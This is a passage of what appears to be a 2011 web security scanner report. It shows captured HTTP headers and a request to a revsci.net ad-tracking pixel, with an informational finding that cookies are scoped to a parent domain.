Set-Cookie: rtc__ROU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFI0OheQIMVp94t6n7ILtKIEtdyqxPwaKhocXJX+1ZKic5njYIs9HYrq0bIzTlnSCIhQuWgZ0ja1WhQLXzC5PFsT1Y8FcytAHacXSpqQsYZvOkhZmA0aikEDJN/pB4U+02b3xP8vgx3+OZiCk0Kk2iIDPJDuHBy22YnoX+0zqQjPNkDNr266czIE0MGVX/Y/NxI48kH3sAASqKFs2KHe7Fc7HEqw8ECLQJKxkVyc5c5x181fEb6LdI3PaU+3R7UZxCTCIllviBz15aW3QJdVR0osHhipAn6PZ0JYN7/WQaeSiB0ceU65rBxgy7h4i4JavItPfDrcJMbt7ezfT2QmHU9hLg95V5OGzWMoOn+OAaAXRjiHYgJ04gRTQo2I2Gk7zZrHnNKWM9dfY7EBBLn93g1FoAFPv8A3nsr0bLcFfW4eQZ7Bfhb7ObvYMHX8w3MLoJx5Xvntl8AwmoAlw7WpK9BLG2BV50IdOU+TZnsizjLRcXLethY9ZCBCc7mVWMUJeWKt2ydTTi0RM3ygje51x96fCFqvjSU0VGFiIZXq9EHPrTO6astZwm4SM+DKiVxox9BRuYfXPHrsmzUZfxu5F0gT/G0GoLsGPXroGjY33lWdtVlCfIADDdBErp0tGTw/HcDe3dEj3QO7ZQM/JjI7DnkWHLBspvKKKy; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:45 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_9kxA=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:45 GMT; Path=/
Set-Cookie: udm_0=MLv3NzMJZjpn3hc5wFS8IC+r63dQ4yV9iELcnt71VAcNP2TS4VlY4qSUGIOcGZlUB4SruQLl9XR5YWUgVeRUU77T0dB9naIjMHUteEdll6CqndD77KDwanYyeIPEsromGmlbIRKUEZS8jq4WxhsFj39udeAFFAknY9O3Tf4J3+kK705f7d7TOVG1VssiqLhWRKH8zB3RhDIGHZ8tevRe+ZcG+Tk9uXoVQNelb7K4ea6fuMFUkAPu8Pjr7YUal5o+TRzZj9/waTAca6i2pP7y+DrGqQJ442yc4kq2MARSn29yPdLLQaGxYVRsuQItBsfhjPjts+0YduGeKButufXSv9LYpMBuMJFS29bADyVNqa6cOaTxpvTZDPGWL61WPK0GBV/ewh6UyFmlzI+LcHSMjocG7Jts/iygOUJSrVWZygHqUtXHSFjSc76m9hY+gTAcVQNd1h2qv5b5xmjKRPMMB2vmOCBHBrPFEnnulNloRpx6IuUCwSQd5sQUNxbCpI7j/BCeLazR+m05XRiPCjAw/sLTpUL65WqpY7F8GkLz+azI+9ft/52THWJA0Ur6fXgFE3xvpgNd6hv13xC5WMsRpa5Vxv1Ney0PDTVjzuZPaHnnRGTTGLv9OAzLlkI/lvjbLO9cJJ/ZCoKwMDZwzDQMjFqQpUQwJHPPViweNNMPNSxRrf8NdCF7eY4IFn5MI0hukpZdP+mcCFO/9u5gzpGLuKQwXQ6WvTWKi+LOr+0H1rEJ+HRy/sTaSgPRzTf1vcEL9TmpK/6tQ5Tb0ENzqfVqrIes/Lv1c+cuPXd2aNrMJc6zQNbP8lgOSMdqftReq7X4LkuqQiW2womb6EnfPjUhLBWa4j32mzc+bMyM8r35es1O24x0W1POv/N3z63mno0VRICkl1ISeXy7l25e8FlFOF++cUQ6MAif5q49Tu3VzcqlhTQfBKAKMUxZqYDRpXbSqO/Lp1X9kRZfbvd4v0XoDpXmpKAYoIj8H9E3MZql03Qw6bhPivuDhTq5BruzECG4FTzkqRTpEdmL2eGV77DOx4wWGGvJpZ+Zpf0cndeNSsBbERulBkrtegdxjK6HgZJ6IB1ETlSzOLAezrrHyZxx+FWVvRbbvRY8j93s/aqVKkrLl+Jjtt/NsLVttpnoNn64gETVXp4q0FeBbHTixP2vr7GjDRviF9xcJSeCt5C5+BcSAOfhHxXQ0O6FJbTDYn33L9BexlXTvxpBPRoFoMWSSFUjtvxqHzhCqGuhdxOMUM/oAqP1UqkouPaSIhiyXov8mnO2vRxd3iG3/mZXbn7ocz976yf3pqw2FH7lIoeo8aREOVrVQGE53MCact/SOv0jXCjdyb5XW9mpBVgrSK2Jw9DEDWntbpoKb7bJY41tEe1a0QZHeb2HJfM1T4nXkqTkVir2Vt+kjxzNUkOK96OTA6Tcx9+YNSnc+IYwXsTPJ5oZocckG6NhFHW0puH3pDKCS1Tz6RmeF289+Q6dPSjIrDQOESfRRXah1JiGz6dr5+Slj9jMQ9ji0RwjXBosKA+hK9FYt9f8pFTLvV2tvAn9tszj4NSpcMqN+Uq1hF2OcCw1frrs6wl0ddNz7XGuoibEBQ4rvG/oYzzbYjU2t1QjL/XltVJFx/hM927IBi2S+Ha1IZzca/Yl8Gf8AoZSMFHxZZEsSNEncvVHQhezA5K/ty2OvHNtnWqUqsLJgHXPXM5bpxtI0O9vbu83KOYKuogOWLcCcrKhUu+pMkSh1FwNKcWITb+Dq1swWctNgQLNisE9il8Ax/tz; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:45 GMT; Path=/
X-Proc-ms: 7
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Mon, 13 Jun 2011 11:25:44 GMT

GIF89a.............!.......,...........D..;

12.111. http://pix04.revsci.net/H07710/b3/0/3/1003161/554831275.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07710/b3/0/3/1003161/554831275.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MmhOXMMpjaBv3Bh9uxc4xrMriSJbZsgJmILMDUmufM9tNd4heJ7St7GX0DL0+fSLUTLoEm+Lgqh8P1UFkgJne7ZsOV6Ta1iuv1MzhmYhirHc/Hg4emnRkQiJyODMbw1LI67VP6jyT9H+Vu8imVtfewvZBiSnz4xalQVQYQWZHho33J8VSL//eihmZmQwg8GB3pzT6R4US7aShMFmG4Ctj87cLP7x8ykvNYOj8JjFiA2bx5/wsk+wcpVASrVvAqbFYixb4BTysfLvrp54sPQqfvv2qUGM1bx+CXDqmENqpRULiJ2hkb4NR7dWDDYzr6VgixY+eZtYUoJDHhKniAHbNTkZjJ4xM/paAPsLWLBKuaceuSA+v95s0MBcl7olnK3/TrZgcO+i4pWN/4d9UkqTT6h8PiIWDdly8STZq+P0DOG8ZdVc7BWNdCFqdEJoL43svmqhUHjpL0O5PRvajJE9TLYndlrtTsW8QZPEsrADxN1SLAvHPBpF6zrCIKNga6jMOLv6gOPdQgcAl2Nu4/L0VlD+1dFUpyE6Kf55xZrh4988vaC7FCvvrzYnOzxd3ej16GXnZ3CffZ7nP1piX8BiOYZMkMdIYCIAtLdxqlElFhHh+zW2Y+mN2GT7RmtcFpzvpUTK5i8BSBzlUVdvYrROy0=; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:37 GMT; Path=/
rtc_imR1=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:37 GMT; Path=/
NETSEGS_H07707=82f4957c1a652091&H07707&0&4e1addb1&0&&4df433b9&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Mon, 11-Jul-2011 11:25:37 GMT; Path=/
udm_0=MLv3NzMJZjpn3hc5wFS81/H1SzcDYOhIvxMJqN1IP6F6114LYC9oZ++Kg6mfGZlUB4SruQLl9XR5YWUgVexUU77T0dB9naIjEG35bFZpiOLnlDdGTCH0anYyeIPEsromGmlbIRKUEZS8jq4WxhsFj39udeAFFAknY9O3Tf4J3+kK705f7d7TOVG1VssiqLhWRK38zB2hkrdv3xhH5C18JIEzrVfJ7OrBd7qc2wgPbQ7YF7hgeFC8L0yhPZXcBaFO9d8zkKTgfqjf/gPrBrSuLVMPBdPtqGGFqW/rScn+f2NyybirTIELYXPhl1lcM7K7EUyiEqFd9bweR9wPi7ExFdk9mTGHzPt+/CUM1kH3iQAFxJjIAvE7LiyAQAdlkgZQ0/Y4qtcARP2ZsXsR8+0Xie/SJRzvKN2IV5H4Hf38scui+KSPdf+44AiYo0EvEdPZGtvlPF+btZqvsm0yaUHPM2S4SyB3SA8zx9AmGT3tdIXl28LQq8W+Jw759OwqUNnBinnJvwjch3Uy/ziNDnXlpQlOUKWCF+7FMNWx+jiGEBeL128CxR9Ve7bk2/qHMSIpenGnkCmNA3wEA7iAYh0sU0XpmYGFYrIqWTSiSszv9GpWeSAavobBof/LzMp2HwcDN5Wjpu9OrFzEciMgSmQZui2dEu2ifbPb7aV7JQppNbJd8YY5pD2iMJft7eb9dHplilmuJiD++CsYwpQsHIzbAFWkaa9ZHuT4W4IKXgfvwQNqx7Pg10+Y7jkd6bRHlqW+0/qF4gbFbA3I2qwFI4fj0ZiIiRYi88MGVGyLnKcRU6e9cTg2oHjMfClFb6H4ZQ5XQXQbTUOIsJ0aP3wlL8mb8boeOsmqg/dK5TfnrpWl95b2pika9uYwjrdXt+3nno3VRDQpDDOLklHggH4gOBAs0wzTdznhALOoYj3SCnUIB03orcqMp9ak9/gx3LbD4nsL8kNPLA7ZnoIobXuRMK1RGq4hY2cG6cYZm5Mvf7oo7zZ6VELFkh7rs4MA8QgZsj8y6FF1HEIEvN/fgiI+Wij+yAMgMhKEcsVibrEGpqRLBnP4YjliPjiRiQRE9c5vTBreNR00oDO9uFdzpIsIyP4HHE/khmLThcSKZKKH+5+OPLAUnUr+/ZeBjcbc3tAKSuUrNkwLuNEKYPAfs6g4VoRjM2wNhfs4Xq6vQScQDzlW/jtWiUJKZhQmfrlufldv3r5FMG+pktQGqTNU89AFMnw53WaiUATasvqtt86OPxCyXMeqG3xoGKdF9y8YobGJcvDv3G1V/d6F12pAJBoykm60am/2kA02Xex/E9MgHL39M9M24HkqBAZpudBU8NCQFV1BzDkoGhLL6zUV+DhCKCrR2whYJHCggpMYKejEznGJYnwUva35PctcwaLHSOcSr1CjMPcHjOqzAQPso/vxmymRP91TH6Gz3m3Vs68Haupwzn9YrVuZ9e+CIWKyRlDIUf3/JjujwWA1UfX8ond66OQ0CkfYcD5wgq+2m52ayBnQ45aS0BtapiNMQcL54ySuN+Op0XObPdQNV3zmiFahFYTxFxHa0gFNhXdLu9OHHZOu1SJAPjeS0pA7ZHIDZXA29B8GK2iDlmPDGbXnH3B2J3lCsKNE3v83dCdzUlQp1yaymlblZzbPNcJFnHEC46TrJP81Nr4J0KF6oTH07Yo8tZpAf1ODAm9Ozlq1D2PD6LLqg4K9I8/F+k8eRgYtRD1C7LW+AsGTtfAjBkj8BSHUBhqGiim3OMyowQb10jUNrWUzgxTYiGeBTvvk; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:37 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07710/b3/0/3/1003161/554831275.js?D=DM_LOC%3Dhttp%253A%252F%252Ftunedin.blogs.time.com%252F2011%252F06%252F13%252Fgame-of-thrones-watch-its-all-in-the-execution-2%252F%253Freferrer%253Dundefined%2526_rsiL%253D0%26DM_CAT%3Dtime%2520%253E%2520arts%2526entertainment%2520%253E%2520tuned_in%26DM_EOM%3D1&C=H07710 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e047724&2&10055,10194&4dde515c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzUJZjpr3hc5wFS813GquQMtQrAqXr4DyJtMPyEMN2TS4VlY4qaUGoMGVAYaUgmDvwI5res2yCHqJwUpCl8bXI1x2wD2amdH8k/jmAEMGSOlVkBFtOHkIA6N1ceb/+CvvanugMzfmMxWWXiH+6F/8lLEaTCDxKBO/YXEqzX4Pi64WdCM+73ICL50mkePx5jppZKMzuvHQvSmzKdqHHrrktHJ7LGJATufSzktpJth5OLBEvqEdtzILZmKkac33pw9eJA0okhYvr3qEwAhbz8gJRIOqtT+5cjRdHKlimR/Zf93uEUDyKNOthtBPTpDfREoUp4+5xZWmQJB1g7Bxosyp7HtkUqHuuVgkejaqxCG/g0P7jfgEtR6yLJhEa1Mz7FcRqUGysjKJWzcg5bYZ/ah5Fad96qjRGwPmbnDK5pG67okplQUCPx11iN+fq6uDPiFmZyi0d8JFHm6/2xmN2F6CBXCK6nCSeag6hpLMYOrP3AuUlzqrT7U+Skck+w8glwHhLBLft6YDemqE7Xj0YSR6y4uerWSr2wDFEyV4QJzZ/f+aIOrMR+MkjPltiWeupGgUBrbVnlI24uQ8NgpQcaQKaAFcOoN3NIXqlndo6CvEMQnGhz7gC/JdhZoN7Wj/qpdMetXR/71M7dw3ZB7CuFbBcsMHprOAN3hCv3z/bsOsvah5chlzKYLwxCi8x5S6fQayhX7Wniskh5TCbKxZqXHH+QkNnIBee451U7u3RpQgE9T1SoYQ7zt0XqCh+TO9S2b4Mx54jZr0uA345XOjOU4v7nwrHmxWEA5L0F1MjsUmQnr3tclotWbW2w07LKBIo7yHjwliEDEm1pGvY+a+xfgHap83+GatrgN4ecSGRbCBFgCp+diviMKyrb0nXAwpNhKNkTwtiqdxn6jRuaSmQmu9WZeYV/AULKCZqkDldQFAQhnyVYu13NtRA/BR6BYbX7XsruYKzJ65hL/Vaisc52Il0CA9p8C3UjyqUD+M3O2IfGQZuo2tmWzjMz32TwvlxhESwu6XqR4oJPWtsvLJA1+T3RtNpAFkY6cd++fnc2AzOEeTu5kNwMVtlXikR8rGp9Pg9mwAzQjiMazwVr8v0V9JlbPx+CPllP7ni3ngUtRNGskfAGCc1hOSGLCJxqFvV1MmP4/aoZF6CEdwEEWtAaDLeeBC0kNj/wIEukEprxcgJda2HyyUZ8Hb3n5budHji3Z5USTlT4kELyS0IGH6x/OF7i4jeLIXokyAqHbH2pLeVL7YdRY925o6Xwxo0UorOxWbHFpgiOl1VCgM0O+0weuPSs4jnQ173hP1RYsBdNHJ7HfHDqStStYzQW297VlWqbgULKuXEdCMw2S0AcUlplKJlnmm+8ZiTNZjzyy7PXjlAXzN6v9a7hYqf71T83w1Vf7A//vmNJZ9E2jvUwnvKeU96Tfcz7HTvKmGvis9fi3yNpdVS8Y18CscOUtVKfM+90wLhHo3WeyA4KHZLCXCPmbHEPZI163kCeYdzAGCD4BaQaadnfR6iSrVDGXghSYibeYzhLdX8Y5DCfeLtpNegAnOiNZKbAXJtLJ7EMgKSRXOwK8sVTAXW6bYp+u7INAiKp0chr3RDWlxuB12F0rPA5Y3CezL56SO1BI4S9YU7JCwjBlwIv4QODoc3a1Mbd8YgQKTOkyY8DoLmcIIHLimis0ygM1Bcggp9AvBPj/jKrxx1EMICy1b5gp+NXuJfk9LHBh+rmfQt7otQ==; rsiPus_TcLI="MLsXtaMOZwhnJpGoWeqiOkhRBfJq5qBSuRPKlWnBpfgZQSo6yJttbu+GJyr/FnqFiBtOj0MMf0A1OS6DgqF3FRtvufvgyQjAvbavIAzG/mrl5fos0jzFySM3Fy31Ao7Ebh3uztX78jATDhVNx1WRMLmFpna/hMyk0AkQ+RGNw8/ja9DZvVCIoWOZ3zoWVkQWa3moHLdcLNNI+7fIXit9fQONqT14U1w0FPBb9cgsoqgd68j6eMttu34aVZu/d+fUj7isKrKe4cndCaLYExmogONnWhKh+J9f7TLfa6PH0tptHMuZOF1cSr7P5cqBLbvFUcWsfjeMCG/f8spHnxQXAL8nRRC1wzaJ8qPaqDjVHhxu4nIepmoRGgrkOH8O0vQt4286anvsGhDbVv0Nsb7OVX9U0Zc4Vf4dZQ5G2e5hrZb1bJHQdQqjasWp1Nt8jnucTB8b4Q/Jnb3Fh7j+L7FGpNU/zU1yNFDSuSB54znzG47c6DP+6kDji+6RZbnzpWRyVAOCeS9Yc/ZzuNxpSay+Bdpn0kqwIBqeBXERDx1Z7KLNfWn7HtNHpyWaP3I4DNsn8PrZK8b2Gjc0e14CZ245dGCAuQdwJbc6j2SUur9nDYW7cL6tvB5y1MH0cPCty0J2lEFcYTKXCPFsSIp3YAkS32MvvsdoLn1d/krkLg4zda0cMm9Kua59JbmSoXHIJItgIVnEP3SkX7dxYOd/DG7OAoG0I5wUUn+AJ4LRa5kU32nRHVwQaDILCW1VzY0B3lSS6Z9mSpIBHUhRv5gciu6tTOzoiB2kH3XA72pKyLVROk9D4KLucgAAB+ueIRn8wR69h5gPZ+lHiKjpmubSMQ3yV8dSjX1dVUDfUUrBDh8OjRz7WzfanDaDqoUrFKI6EHw1XnTDWLM2cnSFkfFaQgOC8YrZowqyhJMuuVpIx/ixqnDsx9kGIztW8Hi1FuloHNVNBQHIU4G6iJqwoVu6bNOwfNRqNvD/w4oqWtvXqCvuIikhh9wMSzTE0UZqd6ZfWwpbTH1MOPdJdcxX31rZx4qSHBpMhxoyszkjZj9YPfgAMrb86c7kpVdrUj4LxTZs6Z5o82umuiNWChLZ/DvN29RfpYYmRQ073p9Hc48NlMflrzKueAGPB93K3+o1eEBylETNrLYuNFB68oIWntcNDAZLIg2HcsY3N4iXyk2yPWxW6r+YoZUTnq+vo9ElytuK/Jp8W7p4jtG47jpY8kQXsYtu9C3HHcoqi2SdLX2w/VUwBs/3SU3CI25hLq/LU0izRT66MSrwujtCk2q6sM4M"; rsi_us_1000000="pUMlIymnMBYY1A2AKVt/X42sJFnhBIsVXupLmVgPalQSXetQt1elVlvt4Kw5pRsR+P7ZtkH37C+PV21OTgK2tSplzTgX1CmAikLsMGDiVOeyz9gzHAnSm372yh4tVHRxb8PeHhUHejBiiZxOkhaZ045oThXnSR8DAX6fYV/ybIiqulf+Pu3RMyR5oF+yDfrCk40UNg0Mp16XYh7mRSVM/HoY4oDuWAom4gnqrhPe3r+iQUB0j3q0tkwKlBzk/9MGM3R2hf6QFQcFA/Y0lx/KIqYkEDuXlq7lweOLDGfB2KHCGVGkzKMsPN9GFXv/RUyGxIOOHISzxTE3RILsCvsP9soypT8NSUHCAcVVr5WpVuc2vUOi5MgBmGqRNBKolDzTy9/FBYJrmOzpeSO58TchDb61tROKccLOkHuqT1Q1cveswkoS3BkggmAJjNfOnag0xP3yotFAiIv7586EVSdiV8c84zW0RkP0Ltu6foHuhK1+R29GukGI/oWg2BobCpX/IAzdzVQKwKcBRQ4Dgwjtb8LRAPdEqwOSyrmF3oGNQaA0L+897x8nXL3Plyo1+OjxoEKVJ2EzmHkURDIYKyDLfZRA28hnB+UGj8LF9DhdnAYoQ6V2zOBqn6vO+BaB9czT3Pyzhw2zAuBWx+Jz5M1ht4XwlNIFhQpBD9DiYjy8+M6kL8fYMJ5ChzfLzauc4bc2f10QzIGJ/TOEQiJNgm/UYCPJimT8yavPrnQz1SwuiFKZx